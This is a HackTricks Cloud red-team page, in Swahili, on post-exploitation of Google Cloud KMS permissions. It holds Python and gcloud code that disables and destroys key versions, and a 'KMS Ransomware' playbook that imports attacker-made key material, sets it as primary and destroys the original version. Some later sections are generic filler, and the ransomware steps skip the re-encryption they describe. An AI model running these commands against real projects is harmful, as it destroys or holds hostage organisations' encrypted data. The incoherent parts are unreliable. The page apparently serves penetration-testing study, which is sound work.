GCP - KMS Post Exploitation

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Angalia mipango ya usajili!
Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuate kwenye Twitter 🐦 @hacktricks_live.
Shiriki mbinu za udukuzi kwa kuwasilisha PRs kwenye HackTricks na HackTricks Cloud github repos.

KMS

Pata taarifa za msingi kuhusu KMS katika:

GCP - KMS Enum

`cloudkms.cryptoKeyVersions.destroy`

Mshambuliaji mwenye ruhusa hii anaweza kuharibu toleo la KMS. Ili kufanya hivyo unahitaji kwanza kuzima ufunguo na kisha kuuharibu:

# pip install google-cloud-kms

from google.cloud import kms

def disable_key_version(project_id, location_id, key_ring_id, key_id, key_version):
"""
Disables a key version in Cloud KMS.
"""
# Create the client.
client = kms.KeyManagementServiceClient()

# Build the key version name.
key_version_name = client.crypto_key_version_path(project_id, location_id, key_ring_id, key_id, key_version)

# Call the API to disable the key version.
client.update_crypto_key_version(request={'crypto_key_version': {'name': key_version_name, 'state': kms.CryptoKeyVersion.State.DISABLED}})

def destroy_key_version(project_id, location_id, key_ring_id, key_id, key_version):
"""
Destroys a key version in Cloud KMS.
"""
# Create the client.
client = kms.KeyManagementServiceClient()

# Build the key version name.
key_version_name = client.crypto_key_version_path(project_id, location_id, key_ring_id, key_id, key_version)

# Call the API to destroy the key version.
client.destroy_crypto_key_version(request={'name': key_version_name})

# Example usage
project_id = 'your-project-id'
location_id = 'your-location'
key_ring_id = 'your-key-ring'
key_id = 'your-key-id'
key_version = '1'  # Version number to disable and destroy

# Disable the key version
disable_key_version(project_id, location_id, key_ring_id, key_id, key_version)

# Destroy the key version
destroy_key_version(project_id, location_id, key_ring_id, key_id, key_version)

KMS Ransomware

Katika AWS inawezekana kabisa kuiba ufunguo wa KMS kwa kubadilisha sera ya rasilimali ya KMS na kuruhusu tu akaunti ya mshambulizi kutumia ufunguo huo. Kwa kuwa sera hizi za rasilimali hazipo katika GCP hili haliwezekani.

Hata hivyo, kuna njia nyingine ya kutekeleza KMS Ransomware ya kimataifa, ambayo ingehusisha hatua zifuatazo:

Unda toleo jipya la ufunguo na nyenzo za ufunguo zilizoingizwa na mshambulizi

gcloud kms import-jobs create [IMPORT_JOB] --location [LOCATION] --keyring [KEY_RING] --import-method [IMPORT_METHOD] --protection-level [PROTECTION_LEVEL] --target-key [KEY]

Iweke kama toleo chaguo-msingi (kwa data ya baadaye inayosimbwa)
Simbua tena data ya zamani iliyosimbwa na toleo la awali kwa kutumia jipya.
Futa ufunguo wa KMS
Sasa ni mshambuliaji tu, ambaye ana nyenzo asili za ufunguo, ndiye atakayeweza kusimbua data iliyosimbwa

Hapa kuna hatua za kuingiza toleo jipya na kulemaza/kufuta data ya zamani:

# Encrypt something with the original key
echo "This is a sample text to encrypt" > /tmp/my-plaintext-file.txt
gcloud kms encrypt \
--location us-central1 \
--keyring kms-lab-2-keyring \
--key kms-lab-2-key \
--plaintext-file my-plaintext-file.txt \
--ciphertext-file my-encrypted-file.enc

# Decrypt it
gcloud kms decrypt \
--location us-central1 \
--keyring kms-lab-2-keyring \
--key kms-lab-2-key \
--ciphertext-file my-encrypted-file.enc \
--plaintext-file -


# Create an Import Job
gcloud kms import-jobs create my-import-job \
--location us-central1 \
--keyring kms-lab-2-keyring \
--import-method "rsa-oaep-3072-sha1-aes-256" \
--protection-level "software"

# Generate key material
openssl rand -out my-key-material.bin 32

# Import the Key Material (it's encrypted with an asymetrict key of the import job previous to be sent)
gcloud kms keys versions import \
--import-job my-import-job \
--location us-central1 \
--keyring kms-lab-2-keyring \
--key kms-lab-2-key \
--algorithm "google-symmetric-encryption" \
--target-key-file my-key-material.bin

# Get versions
gcloud kms keys versions list \
--location us-central1 \
--keyring kms-lab-2-keyring \
--key kms-lab-2-key

# Make new version primary
gcloud kms keys update \
--location us-central1 \
--keyring kms-lab-2-keyring \
--key kms-lab-2-key \
--primary-version 2

# Try to decrypt again (error)
gcloud kms decrypt \
--location us-central1 \
--keyring kms-lab-2-keyring \
--key kms-lab-2-key \
--ciphertext-file my-encrypted-file.enc \
--plaintext-file -

# Disable initial version
gcloud kms keys versions disable \
--location us-central1 \
--keyring kms-lab-2-keyring \
--key kms-lab-2-key 1

# Destroy the old version
gcloud kms keys versions destroy \
--location us-central1 \
--keyring kms-lab-2-keyring \
--key kms-lab-2-key \
--version 1

`cloudkms.cryptoKeyVersions.useToEncrypt` | `cloudkms.cryptoKeyVersions.useToEncryptViaDelegation`

Maelezo

Hii inaruhusu mtumiaji kutumia toleo la ufunguo wa KMS kwa shughuli za usimbaji fiche. Hii inaweza kutumika kwa shughuli za usimbaji fiche wa data.

Athari

Mvamizi anaweza kutumia ruhusa hii kusimba data kwa kutumia funguo za KMS, ambayo inaweza kusababisha data iliyosimbwa kuwa ngumu kufikia bila ufunguo sahihi.

Upatikanaji

Ruhusa hii inaweza kupatikana kupitia majukumu ya IAM ambayo yanajumuisha ruhusa za KMS.

Mitigations

Punguza ruhusa za IAM kwa watumiaji na majukumu ambayo yanahitaji tu ruhusa za KMS.
Tumia sera za IAM ili kudhibiti upatikanaji wa funguo za KMS.

Uvujaji

Ruhusa za IAM zinazojumuisha cloudkms.cryptoKeyVersions.useToEncrypt au cloudkms.cryptoKeyVersions.useToEncryptViaDelegation zinaweza kuvuja kupitia mipangilio isiyo salama ya IAM.
Funguo za KMS zinaweza kuvuja ikiwa mvamizi anaweza kupata ruhusa hizi.

Uthibitisho

Pata ruhusa za IAM za mtumiaji:

gcloud projects get-iam-policy $PROJECT_ID --flatten="bindings[].members" --format='table(bindings.role)' --filter="bindings.members:$USER"

Angalia kama mtumiaji ana ruhusa za cloudkms.cryptoKeyVersions.useToEncrypt au cloudkms.cryptoKeyVersions.useToEncryptViaDelegation.

Uboreshaji

Hakikisha kuwa ruhusa za IAM zinapunguzwa kwa watumiaji na majukumu ambayo yanahitaji tu ruhusa za KMS.
Tumia sera za IAM ili kudhibiti upatikanaji wa funguo za KMS.

from google.cloud import kms
import base64

def encrypt_symmetric(project_id, location_id, key_ring_id, key_id, plaintext):
"""
Encrypts data using a symmetric key from Cloud KMS.
"""
# Create the client.
client = kms.KeyManagementServiceClient()

# Build the key name.
key_name = client.crypto_key_path(project_id, location_id, key_ring_id, key_id)

# Convert the plaintext to bytes.
plaintext_bytes = plaintext.encode('utf-8')

# Call the API.
encrypt_response = client.encrypt(request={'name': key_name, 'plaintext': plaintext_bytes})
ciphertext = encrypt_response.ciphertext

# Optional: Encode the ciphertext to base64 for easier handling.
return base64.b64encode(ciphertext)

# Example usage
project_id = 'your-project-id'
location_id = 'your-location'
key_ring_id = 'your-key-ring'
key_id = 'your-key-id'
plaintext = 'your-data-to-encrypt'

ciphertext = encrypt_symmetric(project_id, location_id, key_ring_id, key_id, plaintext)
print('Ciphertext:', ciphertext)

`cloudkms.cryptoKeyVersions.useToSign`

Matumizi ya Ruhusa

Ruhusa ya cloudkms.cryptoKeyVersions.useToSign inaruhusu mtumiaji kutumia toleo la ufunguo wa KMS kusaini data. Hii inaweza kutumika kwa shughuli kama vile kusaini hati au kudhibitisha utambulisho.

Post Exploitation

Baada ya kupata ruhusa ya cloudkms.cryptoKeyVersions.useToSign, unaweza kutumia ufunguo wa KMS kusaini data. Hii inaweza kusaidia katika kudhibitisha hati au shughuli nyingine zinazohitaji saini ya dijiti.

Amri za Gcloud

Unaweza kutumia amri za gcloud kusaini data kwa kutumia ufunguo wa KMS. Hapa kuna mfano wa jinsi ya kufanya hivyo:

gcloud kms keys versions sign --key <KEY_NAME> --keyring <KEYRING_NAME> --location <LOCATION> --digest-algorithm <DIGEST_ALGORITHM> --digest <DIGEST>

Hatua za Kuchukua

Pata jina la ufunguo (<KEY_NAME>), jina la keyring (<KEYRING_NAME>), na eneo (<LOCATION>).
Chagua algorithm ya digest (<DIGEST_ALGORITHM>) na digest (<DIGEST>).
Tumia amri ya gcloud kusaini data.

Hitimisho

Ruhusa ya cloudkms.cryptoKeyVersions.useToSign ni muhimu kwa shughuli zinazohitaji saini ya dijiti. Kwa kutumia amri za gcloud, unaweza kusaini data kwa urahisi na kuhakikisha usalama wa hati zako.

import hashlib
from google.cloud import kms

def sign_asymmetric(project_id, location_id, key_ring_id, key_id, key_version, message):
"""
Sign a message using an asymmetric key version from Cloud KMS.
"""
# Create the client.
client = kms.KeyManagementServiceClient()

# Build the key version name.
key_version_name = client.crypto_key_version_path(project_id, location_id, key_ring_id, key_id, key_version)

# Convert the message to bytes and calculate the digest.
message_bytes = message.encode('utf-8')
digest = {'sha256': hashlib.sha256(message_bytes).digest()}

# Call the API to sign the digest.
sign_response = client.asymmetric_sign(name=key_version_name, digest=digest)
return sign_response.signature

# Example usage for signing
project_id = 'your-project-id'
location_id = 'your-location'
key_ring_id = 'your-key-ring'
key_id = 'your-key-id'
key_version = '1'
message = 'your-message'

signature = sign_asymmetric(project_id, location_id, key_ring_id, key_id, key_version, message)
print('Signature:', signature)

`cloudkms.cryptoKeyVersions.useToVerify`

Maelezo

Hii inaruhusu mtumiaji kutumia toleo la ufunguo wa KMS kuthibitisha data iliyosainiwa.

Athari

Hii inaweza kuruhusu mshambuliaji kuthibitisha data iliyosainiwa kwa kutumia ufunguo wa KMS, ambayo inaweza kusaidia katika mashambulizi mengine.

Uthibitisho

Hakikisha kuwa una ruhusa ya cloudkms.cryptoKeyVersions.useToVerify kwenye mradi wa GCP. Unaweza kutumia amri ifuatayo ya gcloud kuthibitisha:

gcloud kms keys versions list --location <location> --keyring <keyring> --key <key>

Mitigation

Zuia ruhusa ya cloudkms.cryptoKeyVersions.useToVerify kwa watumiaji wasiohitajika.

from google.cloud import kms
import hashlib

def verify_asymmetric_signature(project_id, location_id, key_ring_id, key_id, key_version, message, signature):
"""
Verify a signature using an asymmetric key version from Cloud KMS.
"""
# Create the client.
client = kms.KeyManagementServiceClient()

# Build the key version name.
key_version_name = client.crypto_key_version_path(project_id, location_id, key_ring_id, key_id, key_version)

# Convert the message to bytes and calculate the digest.
message_bytes = message.encode('utf-8')
digest = {'sha256': hashlib.sha256(message_bytes).digest()}

# Build the verify request and call the API.
verify_response = client.asymmetric_verify(name=key_version_name, digest=digest, signature=signature)
return verify_response.success

# Example usage for verification
verified = verify_asymmetric_signature(project_id, location_id, key_ring_id, key_id, key_version, message, signature)
print('Verified:', verified)

Jifunze na kufanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Jifunze na kufanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Angalia mipango ya usajili!
Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuate kwenye Twitter 🐦 @hacktricks_live.
Shiriki mbinu za udukuzi kwa kuwasilisha PRs kwenye HackTricks na HackTricks Cloud repos za github.

PreviousGCP - IAM Post Exploitation NextGCP - Logging Post Exploitation

Last updated 1 month ago

KMS

cloudkms.cryptoKeyVersions.destroy

KMS Ransomware

Hapa kuna hatua za kuingiza toleo jipya na kulemaza/kufuta data ya zamani:

cloudkms.cryptoKeyVersions.useToEncrypt | cloudkms.cryptoKeyVersions.useToEncryptViaDelegation

Maelezo

Athari

Upatikanaji

Mitigations

Uvujaji

Uthibitisho

Uboreshaji

cloudkms.cryptoKeyVersions.useToSign

Matumizi ya Ruhusa

Post Exploitation

Amri za Gcloud

Hatua za Kuchukua

Hitimisho

cloudkms.cryptoKeyVersions.useToVerify

Maelezo

Athari

Uthibitisho

Mitigation

`cloudkms.cryptoKeyVersions.destroy`

`cloudkms.cryptoKeyVersions.useToEncrypt` | `cloudkms.cryptoKeyVersions.useToEncryptViaDelegation`

`cloudkms.cryptoKeyVersions.useToSign`

`cloudkms.cryptoKeyVersions.useToVerify`